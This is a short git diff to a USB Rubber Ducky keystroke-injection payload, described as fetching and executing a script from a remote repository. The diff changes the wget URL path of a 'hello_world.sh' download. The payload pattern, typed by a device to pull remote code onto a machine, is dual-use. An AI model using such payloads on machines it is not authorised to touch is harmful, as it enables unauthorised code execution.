diff --git a/payload.dd b/payload.dd index 1cad813..af2cc2a 100644 --- a/payload.dd +++ b/payload.dd @@ -4,7 +4,7 @@ REM DESCRIPTION Fetch and execute a script from remote repository REM VERSION 1.0 DELAY 200 -STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bash/hello_world.sh +STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh ENTER DELAY 200